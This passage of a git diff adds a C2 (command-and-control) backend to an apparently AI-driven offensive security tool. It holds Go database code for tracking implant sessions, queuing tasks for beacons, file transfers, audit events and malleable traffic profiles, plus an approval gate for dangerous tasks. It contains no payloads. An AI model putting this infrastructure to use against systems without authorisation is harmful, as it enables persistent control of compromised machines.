&s, nil +} + +// ListC2SessionsFilter 列表过滤参数 +type ListC2SessionsFilter struct { + ListenerID string + Status string // active|sleeping|dead|killed;空表示全部 + OS string + Search string // 模糊匹配 hostname/username/internal_ip + Limit int // 0 表示无限制 +} + +// ListC2Sessions 列表,按 last_check_in 倒序 +func (db *DB) ListC2Sessions(filter ListC2SessionsFilter) ([]*C2Session, error) { + conditions := []string{"1=1"} + args := []interface{}{} + if filter.ListenerID != "" { + conditions = append(conditions, "listener_id = ?") + args = append(args, filter.ListenerID) + } + if filter.Status != "" { + conditions = append(conditions, "status = ?") + args = append(args, filter.Status) + } + if filter.OS != "" { + conditions = append(conditions, "os = ?") + args = append(args, filter.OS) + } + if filter.Search != "" { + conditions = append(conditions, "(hostname LIKE ? OR username LIKE ? OR internal_ip LIKE ?)") + kw := "%" + filter.Search + "%" + args = append(args, kw, kw, kw) + } + query := ` + SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''), + COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''), + COALESCE(is_admin, 0), COALESCE(internal_ip,''), COALESCE(external_ip,''), + COALESCE(user_agent,''), COALESCE(sleep_seconds, 5), COALESCE(jitter_percent, 0), + status, first_seen_at, last_check_in, COALESCE(metadata_json, '{}'), + COALESCE(note, '') + FROM c2_sessions + WHERE ` + strings.Join(conditions, " AND ") + ` + ORDER BY last_check_in DESC + ` + if filter.Limit > 0 { + query += fmt.Sprintf(" LIMIT %d", filter.Limit) + } + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Session + for rows.Next() { + var s C2Session + var isAdminInt int + var metadataJSON string + if err := rows.Scan( + &s.ID, &s.ListenerID, &s.ImplantUUID, &s.Hostname, &s.Username, + &s.OS, &s.Arch, &s.PID, &s.ProcessName, + &isAdminInt, &s.InternalIP, &s.ExternalIP, + &s.UserAgent, &s.SleepSeconds, &s.JitterPercent, + &s.Status, &s.FirstSeenAt, &s.LastCheckIn, &metadataJSON, + &s.Note, + ); err != nil { + db.logger.Warn("扫描 c2_sessions 行失败", zap.Error(err)) + continue + } + s.IsAdmin = isAdminInt != 0 + if metadataJSON != "" && metadataJSON != "{}" { + _ = json.Unmarshal([]byte(metadataJSON), &s.Metadata) + } + list = append(list, &s) + } + return list, rows.Err() +} + +// DeleteC2Session 级联删除其 tasks/files +func (db *DB) DeleteC2Session(id string) error { + res, err := db.Exec(`DELETE FROM c2_sessions WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 任务 +// ---------------------------------------------------------------------------- + +// CreateC2Task 入队一个新任务 +func (db *DB) CreateC2Task(t *C2Task) error { + if t == nil || strings.TrimSpace(t.ID) == "" { + return errors.New("task id is required") + } + if t.CreatedAt.IsZero() { + t.CreatedAt = time.Now() + } + if strings.TrimSpace(t.Status) == "" { + t.Status = "queued" + } + if strings.TrimSpace(t.Source) == "" { + t.Source = "manual" + } + payloadJSON := "{}" + if len(t.Payload) > 0 { + if b, err := json.Marshal(t.Payload); err == nil { + payloadJSON = string(b) + } + } + query := ` + INSERT INTO c2_tasks (id, session_id, task_type, payload_json, status, + result_text, result_blob_path, error, source, conversation_id, approval_status, + created_at, sent_at, started_at, completed_at, duration_ms) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, + t.ID, t.SessionID, t.TaskType, payloadJSON, t.Status, + t.ResultText, t.ResultBlobPath, t.Error, t.Source, t.ConversationID, t.ApprovalStatus, + t.CreatedAt, t.SentAt, t.StartedAt, t.CompletedAt, t.DurationMS, + ) + if err != nil { + db.logger.Error("创建 C2 任务失败", zap.Error(err), zap.String("id", t.ID)) + return err + } + return nil +} + +// SetC2TaskStatus 更新任务的状态/结果/错误/时间戳 +type C2TaskUpdate struct { + Status *string + ResultText *string + ResultBlobPath *string + Error *string + ApprovalStatus *string + SentAt *time.Time + StartedAt *time.Time + CompletedAt *time.Time + DurationMS *int64 +} + +// UpdateC2Task 增量更新任务字段;nil 字段保持原值 +func (db *DB) UpdateC2Task(id string, u C2TaskUpdate) error { + sets := []string{} + args := []interface{}{} + if u.Status != nil { + sets = append(sets, "status = ?") + args = append(args, *u.Status) + } + if u.ResultText != nil { + sets = append(sets, "result_text = ?") + args = append(args, *u.ResultText) + } + if u.ResultBlobPath != nil { + sets = append(sets, "result_blob_path = ?") + args = append(args, *u.ResultBlobPath) + } + if u.Error != nil { + sets = append(sets, "error = ?") + args = append(args, *u.Error) + } + if u.ApprovalStatus != nil { + sets = append(sets, "approval_status = ?") + args = append(args, *u.ApprovalStatus) + } + if u.SentAt != nil { + sets = append(sets, "sent_at = ?") + args = append(args, *u.SentAt) + } + if u.StartedAt != nil { + sets = append(sets, "started_at = ?") + args = append(args, *u.StartedAt) + } + if u.CompletedAt != nil { + sets = append(sets, "completed_at = ?") + args = append(args, *u.CompletedAt) + } + if u.DurationMS != nil { + sets = append(sets, "duration_ms = ?") + args = append(args, *u.DurationMS) + } + if len(sets) == 0 { + return nil + } + query := "UPDATE c2_tasks SET " + strings.Join(sets, ", ") + " WHERE id = ?" + args = append(args, id) + res, err := db.Exec(query, args...) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// GetC2Task 单条 +func (db *DB) GetC2Task(id string) (*C2Task, error) { + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(result_text, ''), COALESCE(result_blob_path, ''), + COALESCE(error, ''), COALESCE(source, 'manual'), + COALESCE(conversation_id, ''), COALESCE(approval_status, ''), + created_at, sent_at, started_at, completed_at, COALESCE(duration_ms, 0) + FROM c2_tasks WHERE id = ? + ` + var t C2Task + var payloadJSON string + var sentAt, startedAt, completedAt sql.NullTime + err := db.QueryRow(query, id).Scan( + &t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.ResultText, &t.ResultBlobPath, + &t.Error, &t.Source, + &t.ConversationID, &t.ApprovalStatus, + &t.CreatedAt, &sentAt, &startedAt, &completedAt, &t.DurationMS, + ) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + if sentAt.Valid { + x := sentAt.Time + t.SentAt = &x + } + if startedAt.Valid { + x := startedAt.Time + t.StartedAt = &x + } + if completedAt.Valid { + x := completedAt.Time + t.CompletedAt = &x + } + return &t, nil +} + +// ListC2TasksFilter 任务过滤 +type ListC2TasksFilter struct { + SessionID string + Status string + Limit int + Offset int +} + +func buildC2TasksWhere(filter ListC2TasksFilter) (where string, args []interface{}) { + conditions := []string{"1=1"} + args = []interface{}{} + if filter.SessionID != "" { + conditions = append(conditions, "session_id = ?") + args = append(args, filter.SessionID) + } + if filter.Status != "" { + conditions = append(conditions, "status = ?") + args = append(args, filter.Status) + } + return strings.Join(conditions, " AND "), args +} + +// CountC2Tasks 与 ListC2Tasks 相同过滤条件下的记录总数 +func (db *DB) CountC2Tasks(filter ListC2TasksFilter) (int64, error) { + where, args := buildC2TasksWhere(filter) + query := `SELECT COUNT(*) FROM c2_tasks WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// CountC2TasksQueuedOrPending 统计 queued/pending 状态任务数(仪表盘「待审任务」) +func (db *DB) CountC2TasksQueuedOrPending(sessionID string) (int64, error) { + conditions := []string{"status IN ('queued', 'pending')"} + args := []interface{}{} + if sessionID != "" { + conditions = append(conditions, "session_id = ?") + args = append(args, sessionID) + } + query := `SELECT COUNT(*) FROM c2_tasks WHERE ` + strings.Join(conditions, " AND ") + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// ListC2Tasks 任务列表,按创建时间倒序 +func (db *DB) ListC2Tasks(filter ListC2TasksFilter) ([]*C2Task, error) { + where, args := buildC2TasksWhere(filter) + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(result_text, ''), COALESCE(result_blob_path, ''), + COALESCE(error, ''), COALESCE(source, 'manual'), + COALESCE(conversation_id, ''), COALESCE(approval_status, ''), + created_at, sent_at, started_at, completed_at, COALESCE(duration_ms, 0) + FROM c2_tasks + WHERE ` + where + ` + ORDER BY created_at DESC + ` + limit := filter.Limit + offset := filter.Offset + if offset < 0 { + offset = 0 + } + if limit > 0 { + if limit > 1000 { + limit = 1000 + } + query += ` LIMIT ? OFFSET ?` + args = append(args, limit, offset) + } + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Task + for rows.Next() { + var t C2Task + var payloadJSON string + var sentAt, startedAt, completedAt sql.NullTime + if err := rows.Scan( + &t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.ResultText, &t.ResultBlobPath, + &t.Error, &t.Source, + &t.ConversationID, &t.ApprovalStatus, + &t.CreatedAt, &sentAt, &startedAt, &completedAt, &t.DurationMS, + ); err != nil { + db.logger.Warn("扫描 c2_tasks 行失败", zap.Error(err)) + continue + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + if sentAt.Valid { + x := sentAt.Time + t.SentAt = &x + } + if startedAt.Valid { + x := startedAt.Time + t.StartedAt = &x + } + if completedAt.Valid { + x := completedAt.Time + t.CompletedAt = &x + } + list = append(list, &t) + } + return list, rows.Err() +} + +// PopQueuedC2Tasks 取出某会话所有 queued/approved 任务(用于 beacon 拉取),原子置为 sent +func (db *DB) PopQueuedC2Tasks(sessionID string, limit int) ([]*C2Task, error) { + if limit <= 0 { + limit = 50 + } + tx, err := db.Begin() + if err != nil { + return nil, err + } + committed := false + defer func() { + if !committed { + _ = tx.Rollback() + } + }() + query := ` + SELECT id, session_id, task_type, COALESCE(payload_json, '{}'), + status, COALESCE(source, 'manual'), COALESCE(approval_status, ''), + created_at + FROM c2_tasks + WHERE session_id = ? AND (status = 'queued' AND (approval_status = '' OR approval_status = 'approved')) + ORDER BY created_at ASC + LIMIT ? + ` + rows, err := tx.Query(query, sessionID, limit) + if err != nil { + return nil, err + } + var list []*C2Task + for rows.Next() { + var t C2Task + var payloadJSON string + if err := rows.Scan(&t.ID, &t.SessionID, &t.TaskType, &payloadJSON, + &t.Status, &t.Source, &t.ApprovalStatus, &t.CreatedAt); err != nil { + rows.Close() + return nil, err + } + if payloadJSON != "" && payloadJSON != "{}" { + _ = json.Unmarshal([]byte(payloadJSON), &t.Payload) + } + list = append(list, &t) + } + rows.Close() + + now := time.Now() + for _, t := range list { + if _, err := tx.Exec( + `UPDATE c2_tasks SET status = 'sent', sent_at = ? WHERE id = ?`, now, t.ID, + ); err != nil { + return nil, err + } + t.Status = "sent" + t.SentAt = &now + } + if err := tx.Commit(); err != nil { + return nil, err + } + committed = true + return list, nil +} + +// DeleteC2Task 删除任务(一般用于 cancel queued) +func (db *DB) DeleteC2Task(id string) error { + res, err := db.Exec(`DELETE FROM c2_tasks WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// DeleteC2TasksByIDs 按主键批量删除任务 +func (db *DB) DeleteC2TasksByIDs(ids []string) (int64, error) { + if len(ids) == 0 { + return 0, nil + } + const maxBatch = 500 + if len(ids) > maxBatch { + ids = ids[:maxBatch] + } + clean := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if !validC2TextIDForDelete(id) { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + clean = append(clean, id) + } + if len(clean) == 0 { + return 0, ErrNoValidC2TaskIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, len(clean)) + for i := range clean { + args[i] = clean[i] + } + query := `DELETE FROM c2_tasks WHERE id IN (` + placeholders + `)` + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 文件 +// ---------------------------------------------------------------------------- + +// CreateC2File 记录上传/下载凭证(实际文件落盘由调用方处理) +func (db *DB) CreateC2File(f *C2File) error { + if f == nil || strings.TrimSpace(f.ID) == "" { + return errors.New("file id is required") + } + if f.CreatedAt.IsZero() { + f.CreatedAt = time.Now() + } + query := ` + INSERT INTO c2_files (id, session_id, task_id, direction, remote_path, + local_path, size_bytes, sha256, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, f.ID, f.SessionID, f.TaskID, f.Direction, + f.RemotePath, f.LocalPath, f.SizeBytes, f.SHA256, f.CreatedAt) + return err +} + +// ListC2FilesBySession 列出某会话下所有上传/下载凭证 +func (db *DB) ListC2FilesBySession(sessionID string) ([]*C2File, error) { + query := ` + SELECT id, session_id, COALESCE(task_id, ''), direction, remote_path, local_path, + COALESCE(size_bytes, 0), COALESCE(sha256, ''), created_at + FROM c2_files WHERE session_id = ? ORDER BY created_at DESC + ` + rows, err := db.Query(query, sessionID) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2File + for rows.Next() { + var f C2File + if err := rows.Scan(&f.ID, &f.SessionID, &f.TaskID, &f.Direction, + &f.RemotePath, &f.LocalPath, &f.SizeBytes, &f.SHA256, &f.CreatedAt); err != nil { + continue + } + list = append(list, &f) + } + return list, rows.Err() +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 事件审计 +// ---------------------------------------------------------------------------- + +// AppendC2Event 写一条审计事件 +func (db *DB) AppendC2Event(e *C2Event) error { + if e == nil { + return errors.New("event is nil") + } + if strings.TrimSpace(e.ID) == "" { + return errors.New("event id is required") + } + if e.CreatedAt.IsZero() { + e.CreatedAt = time.Now() + } + if strings.TrimSpace(e.Level) == "" { + e.Level = "info" + } + dataJSON := "" + if len(e.Data) > 0 { + if b, err := json.Marshal(e.Data); err == nil { + dataJSON = string(b) + } + } + query := ` + INSERT INTO c2_events (id, level, category, session_id, task_id, message, data_json, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, e.ID, e.Level, e.Category, e.SessionID, e.TaskID, e.Message, dataJSON, e.CreatedAt) + return err +} + +// ListC2EventsFilter 事件查询参数 +type ListC2EventsFilter struct { + Level string + Category string + SessionID string + TaskID string + Since *time.Time + Limit int + Offset int +} + +func buildC2EventsWhere(filter ListC2EventsFilter) (where string, args []interface{}) { + conditions := []string{"1=1"} + args = []interface{}{} + if filter.Level != "" { + conditions = append(conditions, "level = ?") + args = append(args, filter.Level) + } + if filter.Category != "" { + conditions = append(conditions, "category = ?") + args = append(args, filter.Category) + } + if filter.SessionID != "" { + conditions = append(conditions, "session_id = ?") + args = append(args, filter.SessionID) + } + if filter.TaskID != "" { + conditions = append(conditions, "task_id = ?") + args = append(args, filter.TaskID) + } + if filter.Since != nil { + conditions = append(conditions, "created_at >= ?") + args = append(args, *filter.Since) + } + return strings.Join(conditions, " AND "), args +} + +// CountC2Events 与 ListC2Events 相同过滤条件下的记录总数 +func (db *DB) CountC2Events(filter ListC2EventsFilter) (int64, error) { + where, args := buildC2EventsWhere(filter) + query := `SELECT COUNT(*) FROM c2_events WHERE ` + where + var n int64 + err := db.QueryRow(query, args...).Scan(&n) + return n, err +} + +// ListC2Events 事件查询,按创建时间倒序 +func (db *DB) ListC2Events(filter ListC2EventsFilter) ([]*C2Event, error) { + where, args := buildC2EventsWhere(filter) + limit := filter.Limit + if limit <= 0 || limit > 1000 { + limit = 200 + } + offset := filter.Offset + if offset < 0 { + offset = 0 + } + query := ` + SELECT id, level, category, COALESCE(session_id, ''), COALESCE(task_id, ''), + message, COALESCE(data_json, ''), created_at + FROM c2_events + WHERE ` + where + ` + ORDER BY created_at DESC + LIMIT ? OFFSET ? + ` + args = append(args, limit, offset) + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Event + for rows.Next() { + var e C2Event + var dataJSON string + if err := rows.Scan(&e.ID, &e.Level, &e.Category, &e.SessionID, &e.TaskID, + &e.Message, &dataJSON, &e.CreatedAt); err != nil { + continue + } + if dataJSON != "" { + _ = json.Unmarshal([]byte(dataJSON), &e.Data) + } + list = append(list, &e) + } + return list, rows.Err() +} + +// DeleteC2EventsByIDs 按主键批量删除事件,返回实际删除行数 +func (db *DB) DeleteC2EventsByIDs(ids []string) (int64, error) { + if len(ids) == 0 { + return 0, nil + } + const maxBatch = 500 + if len(ids) > maxBatch { + ids = ids[:maxBatch] + } + clean := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if !validC2TextIDForDelete(id) { + continue + } + if _, ok := seen[id]; ok { + continue + } + seen[id] = struct{}{} + clean = append(clean, id) + } + if len(clean) == 0 { + return 0, ErrNoValidC2EventIDs + } + placeholders := strings.Repeat("?,", len(clean)-1) + "?" + args := make([]interface{}, len(clean)) + for i := range clean { + args[i] = clean[i] + } + query := `DELETE FROM c2_events WHERE id IN (` + placeholders + `)` + res, err := db.Exec(query, args...) + if err != nil { + return 0, err + } + return res.RowsAffected() +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 Malleable Profile +// ---------------------------------------------------------------------------- + +// CreateC2Profile 创建/覆盖 Profile(按 name 唯一) +func (db *DB) CreateC2Profile(p *C2Profile) error { + if p == nil || strings.TrimSpace(p.ID) == "" { + return errors.New("profile id is required") + } + if p.CreatedAt.IsZero() { + p.CreatedAt = time.Now() + } + urisJSON, _ := json.Marshal(p.URIs) + reqHdrJSON, _ := json.Marshal(p.RequestHeaders) + resHdrJSON, _ := json.Marshal(p.ResponseHeaders) + query := ` + INSERT INTO c2_profiles (id, name, user_agent, uris_json, request_headers_json, + response_headers_json, body_template, jitter_min_ms, jitter_max_ms, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, p.ID, p.Name, p.UserAgent, string(urisJSON), + string(reqHdrJSON), string(resHdrJSON), p.BodyTemplate, + p.JitterMinMS, p.JitterMaxMS, p.CreatedAt) + return err +} + +// UpdateC2Profile 全量更新 Profile +func (db *DB) UpdateC2Profile(p *C2Profile) error { + if p == nil || strings.TrimSpace(p.ID) == "" { + return errors.New("profile id is required") + } + urisJSON, _ := json.Marshal(p.URIs) + reqHdrJSON, _ := json.Marshal(p.RequestHeaders) + resHdrJSON, _ := json.Marshal(p.ResponseHeaders) + query := ` + UPDATE c2_profiles SET name = ?, user_agent = ?, uris_json = ?, + request_headers_json = ?, response_headers_json = ?, body_template = ?, + jitter_min_ms = ?, jitter_max_ms = ? + WHERE id = ? + ` + res, err := db.Exec(query, p.Name, p.UserAgent, string(urisJSON), + string(reqHdrJSON), string(resHdrJSON), p.BodyTemplate, + p.JitterMinMS, p.JitterMaxMS, p.ID) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// GetC2Profile 单条 +func (db *DB) GetC2Profile(id string) (*C2Profile, error) { + query := ` + SELECT id, name, COALESCE(user_agent, ''), COALESCE(uris_json, '[]'), + COALESCE(request_headers_json, '{}'), COALESCE(response_headers_json, '{}'), + COALESCE(body_template, ''), COALESCE(jitter_min_ms, 0), COALESCE(jitter_max_ms, 0), + created_at + FROM c2_profiles WHERE id = ? + ` + var p C2Profile + var urisJSON, reqHdrJSON, resHdrJSON string + err := db.QueryRow(query, id).Scan(&p.ID, &p.Name, &p.UserAgent, &urisJSON, + &reqHdrJSON, &resHdrJSON, &p.BodyTemplate, &p.JitterMinMS, &p.JitterMaxMS, &p.CreatedAt) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + _ = json.Unmarshal([]byte(urisJSON), &p.URIs) + _ = json.Unmarshal([]byte(reqHdrJSON), &p.RequestHeaders) + _ = json.Unmarshal([]byte(resHdrJSON), &p.ResponseHeaders) + return &p, nil +} + +// ListC2Profiles 全量列表 +func (db *DB) ListC2Profiles() ([]*C2Profile, error) { + query := ` + SELECT id, name, COALESCE(user_agent, ''), COALESCE(uris_json, '[]'), + COALESCE(request_headers_json, '{}'), COALESCE(response_headers_json, '{}'), + COALESCE(body_template, ''), COALESCE(jitter_min_ms, 0), COALESCE(jitter_max_ms, 0), + created_at + FROM c2_profiles ORDER BY created_at DESC + ` + rows, err := db.Query(query) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Profile + for rows.Next() { + var p C2Profile + var urisJSON, reqHdrJSON, resHdrJSON string + if err := rows.Scan(&p.ID, &p.Name, &p.UserAgent, &urisJSON, + &reqHdrJSON, &resHdrJSON, &p.BodyTemplate, &p.JitterMinMS, &p.JitterMaxMS, &p.CreatedAt); err != nil { + continue + } + _ = json.Unmarshal([]byte(urisJSON), &p.URIs) + _ = json.Unmarshal([]byte(reqHdrJSON), &p.RequestHeaders) + _ = json.Unmarshal([]byte(resHdrJSON), &p.ResponseHeaders) + list = append(list, &p) + } + return list, rows.Err() +} + +// DeleteC2Profile 删除 Profile(不影响已用此 Profile 的 listener,仅断开关联) +func (db *DB) DeleteC2Profile(id string) error { + if _, err := db.Exec(`UPDATE c2_listeners SET profile_id = '' WHERE profile_id = ?`, id); err != nil { + return err + } + res, err := db.Exec(`DELETE FROM c2_profiles WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} diff --git a/internal/database/database.go b/internal/database/database.go index d82b23f9..f18c2244 100644 --- a/internal/database/database.go +++ b/internal/database/database.go @@ -283,6 +283,113 @@ func (db *DB) initTables() error { FOREIGN KEY (connection_id) REFERENCES webshell_connections(id) ON DELETE CASCADE );` + // ======================================================================== + // C2 模块(监听器 / 会话 / 任务 / 文件 / 事件 / Malleable Profile) + // ======================================================================== + createC2ListenersTable := ` + CREATE TABLE IF NOT EXISTS c2_listeners ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL, + type TEXT NOT NULL, + bind_host TEXT NOT NULL DEFAULT '127.0.0.1', + bind_port INTEGER NOT NULL, + profile_id TEXT, + encryption_key TEXT NOT NULL DEFAULT '', + implant_token TEXT NOT NULL DEFAULT '', + status TEXT NOT NULL DEFAULT 'stopped', + config_json TEXT NOT NULL DEFAULT '{}', + remark TEXT NOT NULL DEFAULT '', + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + started_at DATETIME, + last_error TEXT + );` + + createC2SessionsTable := ` + CREATE TABLE IF NOT EXISTS c2_sessions ( + id TEXT PRIMARY KEY, + listener_id TEXT NOT NULL, + implant_uuid TEXT NOT NULL UNIQUE, + hostname TEXT, + username TEXT, + os TEXT, + arch TEXT, + pid INTEGER DEFAULT 0, + process_name TEXT, + is_admin INTEGER DEFAULT 0, + internal_ip TEXT, + external_ip TEXT, + user_agent TEXT, + sleep_seconds INTEGER NOT NULL DEFAULT 5, + jitter_percent INTEGER NOT NULL DEFAULT 0, + status TEXT NOT NULL DEFAULT 'active', + first_seen_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + last_check_in DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + metadata_json TEXT DEFAULT '{}', + note TEXT NOT NULL DEFAULT '', + FOREIGN KEY (listener_id) REFERENCES c2_listeners(id) ON DELETE CASCADE + );` + + createC2TasksTable := ` + CREATE TABLE IF NOT EXISTS c2_tasks ( + id TEXT PRIMARY KEY, + session_id TEXT NOT NULL, + task_type TEXT NOT NULL, + payload_json TEXT NOT NULL DEFAULT '{}', + status TEXT NOT NULL DEFAULT 'queued', + result_text TEXT, + result_blob_path TEXT, + error TEXT, + source TEXT NOT NULL DEFAULT 'manual', + conversation_id TEXT, + approval_status TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + sent_at DATETIME, + started_at DATETIME, + completed_at DATETIME, + duration_ms INTEGER DEFAULT 0, + FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE + );` + + createC2FilesTable := ` + CREATE TABLE IF NOT EXISTS c2_files ( + id TEXT PRIMARY KEY, + session_id TEXT NOT NULL, + task_id TEXT, + direction TEXT NOT NULL, + remote_path TEXT NOT NULL, + local_path TEXT NOT NULL, + size_bytes INTEGER DEFAULT 0, + sha256 TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE + );` + + createC2EventsTable := ` + CREATE TABLE IF NOT EXISTS c2_events ( + id TEXT PRIMARY KEY, + level TEXT NOT NULL DEFAULT 'info', + category TEXT NOT NULL, + session_id TEXT, + task_id TEXT, + message TEXT NOT NULL, + data_json TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + createC2ProfilesTable := ` + CREATE TABLE IF NOT EXISTS c2_profiles ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL UNIQUE, + user_agent TEXT, + uris_json TEXT NOT NULL DEFAULT '[]', + request_headers_json TEXT, + response_headers_json TEXT, + body_template TEXT, + jitter_min_ms INTEGER DEFAULT 0, + jitter_max_ms INTEGER DEFAULT 0, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + // 创建索引 createIndexes := ` CREATE INDEX IF NOT EXISTS idx_messages_conversation_id ON messages(conversation_id); @@ -313,6 +420,19 @@ func (db *DB) initTables() error { CREATE INDEX IF NOT EXISTS idx_batch_task_queues_title ON batch_task_queues(title); CREATE INDEX IF NOT EXISTS idx_webshell_connections_created_at ON webshell_connections(created_at); CREATE INDEX IF NOT EXISTS idx_webshell_connection_states_updated_at ON webshell_connection_states(updated_at); + CREATE INDEX IF NOT EXISTS idx_c2_listeners_created_at ON c2_listeners(created_at); + CREATE INDEX IF NOT EXISTS idx_c2_listeners_status ON c2_listeners(status); + CREATE INDEX IF NOT EXISTS idx_c2_sessions_listener ON c2_sessions(listener_id); + CREATE INDEX IF NOT EXISTS idx_c2_sessions_status ON c2_sessions(status); + CREATE INDEX IF NOT EXISTS idx_c2_sessions_last_check_in ON c2_sessions(last_check_in); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_session ON c2_tasks(session_id); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_status ON c2_tasks(status); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_created_at ON c2_tasks(created_at); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_conversation ON c2_tasks(conversation_id); + CREATE INDEX IF NOT EXISTS idx_c2_files_session ON c2_files(session_id); + CREATE INDEX IF NOT EXISTS idx_c2_events_created_at ON c2_events(created_at); + CREATE INDEX IF NOT EXISTS idx_c2_events_category ON c2_events(category); + CREATE INDEX IF NOT EXISTS idx_c2_events_session ON c2_events(session_id); ` if _, err := db.Exec(createConversationsTable); err != nil { @@ -379,6 +499,19 @@ func (db *DB) initTables() error { return fmt.Errorf("创建webshell_connection_states表失败: %w", err) } + for tableName, ddl := range map[string]string{ + "c2_listeners": createC2ListenersTable, + "c2_sessions": createC2SessionsTable, + "c2_tasks": createC2TasksTable, + "c2_files": createC2FilesTable, + "c2_events": createC2EventsTable, + "c2_profiles": createC2ProfilesTable, + } { + if _, err := db.Exec(ddl); err != nil { + return fmt.Errorf("创建%s表失败: %w", tableName, err) + } + } + // 为已有表添加新字段(如果不存在)- 必须在创建索引之前 if err := db.migrateConversationsTable(); err != nil { db.logger.Warn("迁移conversations表失败", zap.Error(err)) diff --git a/internal/handler/agent.go b/internal/handler/agent.go index a2adb8bb..93fad620 100644 --- a/internal/handler/agent.go +++ b/internal/handler/agent.go @@ -184,6 +184,14 @@ func (h *AgentHandler) SetHitlToolWhitelistSaver(s HitlToolWhitelistSaver) { h.hitlWhitelistSaver = s } +// HITLNeedsToolApproval 供 C2 危险任务门控:与会话侧人机协同及免审批白名单判定一致。 +func (h *AgentHandler) HITLNeedsToolApproval(conversationID, toolName string) bool { + if h == nil || h.hitlManager == nil { + return false + } + return h.hitlManager.NeedsToolApproval(conversationID, toolName) +} + // ChatAttachment 聊天附件(用户上传的文件) type ChatAttachment struct { FileName string `json:"fileName"` // 展示用文件名 diff --git a/internal/handler/c2.go b/internal/handler/c2.go new file mode 100644 index 00000000..a835db1b --- /dev/null +++ b/internal/handler/c2.go @@ -0,0 +1,955 @@ +package handler + +import ( + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "os" + "path/filepath" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "github.com/google/uuid" + "go.uber.org/zap" +) + +// C2Handler 处理 C2 相关的 REST API +type C2Handler struct { + manager *c2.Manager + logger *zap.Logger +} + +// NewC2Handler 创建 C2 处理器 +func NewC2Handler(manager *c2.Manager, logger *zap.Logger) *C2Handler { + return &C2Handler{ + manager: manager, + logger: logger, + } +} + +// ============================================================================ +// 监听器 API +// ============================================================================ + +// ListListeners 获取监听器列表 +func (h *C2Handler) ListListeners(c *gin.Context) { + listeners, err := h.manager.DB().ListC2Listeners() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + // 移除敏感字段 + for _, l := range listeners { + l.EncryptionKey = "" + l.ImplantToken = "" + } + c.JSON(http.StatusOK, gin.H{"listeners": listeners}) +} + +// CreateListener 创建监听器 +func (h *C2Handler) CreateListener(c *gin.Context) { + var req struct { + Name string `json:"name"` + Type string `json:"type"` + BindHost string 